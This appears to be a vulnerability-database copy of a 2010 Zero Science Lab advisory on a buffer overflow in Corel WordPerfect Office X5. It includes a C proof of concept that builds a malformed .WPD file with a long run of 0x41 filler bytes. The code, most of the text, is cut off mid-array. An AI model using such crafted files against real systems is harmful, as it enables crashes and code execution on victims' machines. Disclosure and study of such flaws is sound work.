Lucene search
Gjoko KrsticZSL-2010-4945HistoryJul 12, 2010 - 12:00 a.m.
Corel WordPerfect Office X5 15.0.0.357 (wpd) Remote Buffer Preoccupation PoC
2010-07-1200:00:00
Gjoko Krstic
zeroscience.mk
26
8.6 High
AI Score
Confidence
Low
Title: Corel WordPerfect Office X5 15.0.0.357 (wpd) Remote Buffer Preoccupation PoC
Advisory ID: ZSL-2010-4945
Type: Local/Remote
Impact: System Access, DoS
Risk: (4/5)
Release Date: 12.07.2010
Summary
Corel® WordPerfect® Office X5 – Standard Edition is the essential office suite for word processing, spreadsheets, presentations and email. Chosen over Microsoft® Office by millions of longtime users, it integrates the latest productivity software with the best of the Web. Work faster and collaborate more efficiently with all-new Web services, new Microsoft® Office SharePoint® support, more PDF tools and even better compatibility with Microsoft Office. It’s everything you expect in an office suite—for less.
Description
Corel WordPerfect is prone to a remote buffer overflow vulnerability because the application fails to perform adequate boundary checks on user supplied input with .WPD (WordPerfect Document) file. Attackers may exploit this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
Vendor
Corel Corporation - <http://www.corel.com>
Affected Version
15.0.0.357 (Standard Edition)
Tested On
Microsoft Windows XP Professional SP3 (English)
Vendor Status
[09.07.2010] Vulnerability discovered.
[09.07.2010] Initial contact with the vendor.
[12.07.2010] No reply from vendor.
[12.07.2010] Public advisory released.
PoC
Credits
Vulnerability discovered by Gjoko Krstic - <[email protected]>
References
[1] <http://www.exploit-db.com/exploits/14344/>
[2] <http://securityreason.com/exploitalert/8397>
[3] <http://packetstormsecurity.org/filedesc/corelwpoxs-overflow.txt.html>
[4] <http://xforce.iss.net/xforce/xfdb/60280>
[5] <http://www.net-security.org/vuln.php?id=13577>
[6] <http://www.securityfocus.com/bid/41553>
Changelog
[12.07.2010] - Initial release
[13.07.2010] - Added reference [2] and [3]
[15.07.2010] - Added reference [4]
[12.08.2010] - Added reference [5] and [6]
Contact
Zero Science Lab
Web: <http://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>/*
- Title: Corel WordPerfect Office X5 15.0.0.357 (wpd) Remote Buffer Preoccupation PoC
- Vendor: Corel Corporation
- Product Web Page: http://www.corel.com
- Version Tested: 15.0.0.357 (Standard Edition)
- Summary: Corel� WordPerfect� Office X5 � Standard Edition is the essential
office suite for word processing, spreadsheets, presentations and email.
Chosen over Microsoft� Office by millions of longtime users, it integrates
the latest productivity software with the best of the Web. Work faster and
collaborate more efficiently with all-new Web services, new Microsoft� Office
SharePoint� support, more PDF tools and even better compatibility with Microsoft
Office. It's everything you expect in an office suite�for less.
- Desc: Corel WordPerfect is prone to a remote buffer overflow vulnerability because
the application fails to perform adequate boundary checks on user supplied input with
.WPD (WordPerfect Document) file. Attackers may exploit this issue to execute arbitrary
code in the context of the application. Failed attacks will cause denial-of-service
conditions.
- Tested On: Microsoft Windows XP Professional SP3 (English)
- Vulnerability Discovered By: Gjoko 'LiquidWorm' Krstic
- liquidworm gmail com
- Zero Science Lab - http://www.zeroscience.mk
- 09.07.2010
- Vendor status:
[09.07.2010] Vulnerability discovered.
[09.07.2010] Initial contact with the vendor.
[12.07.2010] No reply from vendor.
[12.07.2010] Public advisory released.
- Zero Science Lab Advisory ID: ZSL-2010-4945
- Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4945.php
- PoC:
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <stdint.h>
#define OCCUPANT "Perfect.wpd"
FILE *corel;
char payload[] = {
0xFF, 0x57, 0x50, 0x43, 0xA5, 0x06, 0x00, 0x00, 0x01, 0x0A, 0x02, 0x01, 0x00, 0x00, 0x00, 0x02,
0x05, 0x00, 0x00, 0x00, 0x12, 0x07, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0xE6, 0x64, 0x81, 0xA9,
0x63, 0xAA, 0x00, 0xE6, 0x82, 0xAD, 0x38, 0x49, 0x9F, 0xC6, 0x5B, 0x03, 0x23, 0x6B, 0x12, 0xE6,
0x8F, 0xFA, 0x3C, 0xDA, 0x1F, 0xB0, 0x79, 0x47, 0xEE, 0x86, 0xE2, 0x12, 0x37, 0x36, 0xB8, 0xAA,
0x20, 0x2E, 0xCF, 0x14, 0xBE, 0x54, 0x3E, 0xF8, 0x21, 0xB7, 0x4A, 0x27, 0xBC, 0x72, 0x27, 0xE8,
0x7D, 0x0E, 0x13, 0xC3, 0x16, 0x43, 0xC6, 0x9D, 0xBA, 0xCD, 0xF7, 0x44, 0xF3, 0x06, 0x5D, 0x47,
0x75, 0xA3, 0x86, 0x79, 0xBD, 0x10, 0x0E, 0x80, 0x7A, 0x7E, 0x0F, 0xDD, 0x3F, 0x93, 0xF8, 0x73,
0x84, 0x8C, 0x8B, 0xC1, 0xFA, 0x1D, 0xEC, 0x78, 0x76, 0x38, 0xF3, 0x63, 0x33, 0xCF, 0xEC, 0xAF,
0x44, 0xE3, 0x84, 0xD4, 0x3D, 0x89, 0xC7, 0x94, 0xD8, 0x2C, 0x55, 0x35, 0xDE, 0x72, 0x78, 0x73,
0x6A, 0x7D, 0xE6, 0x99, 0xB6, 0x6B, 0x77, 0xB6, 0x82, 0x09, 0x55, 0xE7, 0x32, 0x3A, 0x26, 0x24,
0x27, 0x1C, 0x0E, 0x5A, 0x63, 0xC1, 0x81, 0x00, 0xBA, 0xEE, 0xD6, 0x67, 0x1D, 0xD1, 0xBF, 0x4E,
0x42, 0x63, 0x9D, 0x4E, 0x67, 0x51, 0x96, 0x8D, 0xF9, 0x9F, 0x1D, 0xC7, 0x30, 0x85, 0x80, 0xCB,
0x94, 0xF7, 0xA7, 0x6F, 0x4C, 0xCF, 0x6A, 0x8F, 0x20, 0x14, 0x66, 0xD1, 0x9B, 0x76, 0x7A, 0x04,
0x8D, 0xC3, 0x4C, 0x11, 0xC5, 0x48, 0x98, 0x8F, 0x64, 0xA5, 0x13, 0x9F, 0xD2, 0x7D, 0x80, 0x31,
0xA3, 0xC6, 0x51, 0x89, 0x03, 0x3E, 0xC9, 0xB2, 0x67, 0x2E, 0x19, 0xB7, 0x28, 0x23, 0xB8, 0x92,
0xF4, 0xA2, 0x90, 0x6D, 0x6B, 0xE3, 0x9C, 0x7F, 0xC8, 0x42, 0x1A, 0x14, 0x0F, 0x3C, 0x40, 0xD9,
0x79, 0x73, 0xA0, 0x65, 0xDD, 0x83, 0x1D, 0x22, 0x42, 0x8D, 0xC1, 0x35, 0x9F, 0xA9, 0x32, 0x50,
0xD4, 0x1F, 0xBA, 0xB5, 0x7B, 0xF6, 0x43, 0x22, 0x7C, 0x7C, 0x32, 0xFF, 0x8E, 0xB7, 0xDD, 0xC3,
0x9A, 0xE1, 0x0E, 0x9E, 0xF1, 0x48, 0xEA, 0xE2, 0xA2, 0xFD, 0xE8, 0x79, 0x87, 0x7A, 0x74, 0x3C,
0x65, 0x76, 0x73, 0x10, 0x18, 0x9D, 0xC9, 0x96, 0x10, 0x9B, 0xEA, 0x6F, 0x16, 0x5A, 0xF6, 0x23,
0xFB, 0xEB, 0xDA, 0x42, 0x0D, 0x33, 0x5A, 0xD7, 0x57, 0xEF, 0x7F, 0xAE, 0x95, 0xCC, 0xEF, 0x65,
0x19, 0x8E, 0xB9, 0x3D, 0xBF, 0x55, 0xC2, 0x32, 0x72, 0x2B, 0x8C, 0xDD, 0x2D, 0x3D, 0x32, 0x53,
0x24, 0x18, 0x3E, 0x02, 0xDE, 0xC4, 0xB9, 0xC0, 0xDA, 0x05, 0x9A, 0xD3, 0x5F, 0x80, 0xF2, 0xB6,
0xCD, 0x1C, 0x91, 0x71, 0xF0, 0xC9, 0x61, 0x7D, 0x72, 0x82, 0x99, 0x81, 0xA6, 0x41, 0x58, 0x3D,
0xC0, 0x11, 0xCF, 0x61, 0x25, 0x5A, 0x54, 0xC9, 0x14, 0x8F, 0x46, 0x16, 0x0C, 0x6B, 0xA9, 0x6D,
0xA3, 0x30, 0xA1, 0xA3, 0xAB, 0x7D, 0xA9, 0x0C, 0x46, 0x57, 0xEB, 0x61, 0x7B, 0x7B, 0x5C, 0x45,
0xDC, 0xA1, 0x20, 0x75, 0x57, 0x2D, 0xEC, 0xDE, 0xEA, 0x12, 0x68, 0x38, 0x48, 0xC7, 0xC6, 0xC1,
0x0D, 0xEF, 0xBA, 0x26, 0x53, 0xF5, 0xB7, 0xF5, 0x7D, 0x2A, 0x60, 0xD5, 0xB7, 0xE2, 0x29, 0x95,
0x37, 0x6C, 0xF9, 0xF8, 0x61, 0x62, 0x02, 0x98, 0xDD, 0xDE, 0x42, 0x31, 0x28, 0xE6, 0xFD, 0xBE,
0xB7, 0xCC, 0x9F, 0x47, 0xFF, 0x7C, 0x78, 0xA3, 0x12, 0x85, 0x35, 0x3C, 0xE3, 0xC0, 0xD5, 0x68,
0x68, 0x69, 0xDB, 0xF4, 0xC2, 0xF7, 0x7E, 0xD7, 0xA6, 0x76, 0xA2, 0x85, 0x04, 0x5A, 0x6C, 0x14,
0xB4, 0x68, 0x49, 0xD0, 0xE9, 0x76, 0x76, 0x27, 0x54, 0x20, 0xEC, 0xCD, 0x3A, 0x55, 0x4E, 0x7F,
0x02, 0x00, 0x0C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x23,
0x01, 0x00, 0x00, 0x00, 0xC9, 0x02, 0x00, 0x00, 0xA8, 0x02, 0x00, 0x00, 0x00, 0x55, 0x01, 0x00,
0x00, 0x00, 0x4E, 0x00, 0x00, 0x00, 0x71, 0x05, 0x00, 0x00, 0x09, 0x25, 0x01, 0x00, 0x00, 0x00,
0x06, 0x00, 0x00, 0x00, 0xBF, 0x05, 0x00, 0x00, 0x0B, 0x30, 0x02, 0x00, 0x00, 0x00, 0x3A, 0x00,
0x00, 0x00, 0xC5, 0x05, 0x00, 0x00, 0x08, 0xE0, 0x01, 0x00, 0x00, 0x00, 0x5A, 0x00, 0x00, 0x00,
0xFF, 0x05, 0x00, 0x00, 0x08, 0x5E, 0x01, 0x00, 0x00, 0x00, 0x0C, 0x00, 0x00, 0x00, 0x59, 0x06,
0x00, 0x00, 0x08, 0x77, 0x01, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x65, 0x06, 0x00, 0x00,
0x08, 0x34, 0x01, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00, 0x69, 0x06, 0x00, 0x00, 0x08, 0x02,
0x01, 0x00, 0x00, 0x00, 0x0F, 0x00, 0x00, 0x00, 0x7D, 0x06, 0x00, 0x00, 0x08, 0x10, 0x01, 0x00,
0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x8C, 0x06, 0x00, 0x00, 0x09, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x6D, 0x01, 0x00, 0x00, 0x00, 0x17, 0x00, 0x00, 0x00, 0x8E, 0x06, 0x00, 0x00,
0x00, 0x98, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x0A,
0x00, 0x0A, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x30, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x26, 0x00, 0xD6, 0x1E, 0x64, 0x0E, 0x39,
0x08, 0x00, 0x00, 0xCC, 0x09, 0x00, 0x0A, 0x00, 0x5A, 0x00, 0x1B, 0x01, 0x00, 0x8B, 0x14, 0x36,
0x00, 0x54, 0x00, 0x69, 0x00, 0x6D, 0x00, 0x65, 0x00, 0x73, 0x00, 0x20, 0x00, 0x4E, 0x00, 0x65,
0x00, 0x77, 0x00, 0x20, 0x00, 0x52, 0x00, 0x6F, 0x00, 0x6D, 0x00, 0x61, 0x00, 0x6E, 0x00, 0x20,
0x00, 0x52, 0x00, 0x65, 0x00, 0x67, 0x00, 0x75, 0x00, 0x6C, 0x00, 0x61, 0x00, 0x72, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x02, 0x00, 0x58, 0x02, 0x01, 0x00, 0x00,
0x00, 0x04, 0x00, 0x28, 0x00, 0x00, 0x00, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x12, 0xFC, 0x9C, 0x24, 0x00, 0xA1, 0x00, 0x00,
0x00, 0xA1, 0x00, 0x00, 0x00, 0xD4, 0x1C, 0x12, 0x00, 0x00, 0x02, 0x00, 0x55, 0x53, 0x55, 0x53,
0x2E, 0x00, 0x2C, 0x00, 0x12, 0x00, 0xD4, 0x38, 0x00, 0x00, 0x00, 0x0E, 0x00, 0x00, 0x00, 0x08,
0x00, 0x00, 0x00, 0x44, 0x00, 0x6F, 0x00, 0x63, 0x00, 0x75, 0x00, 0x6D, 0x00, 0x65, 0x00, 0x6E,
0x00, 0x74, 0x00, 0x4D, 0x00, 0x61, 0x00, 0x6E, 0x00, 0x61, 0x00, 0x67, 0x00, 0x65, 0x00, 0x6D,
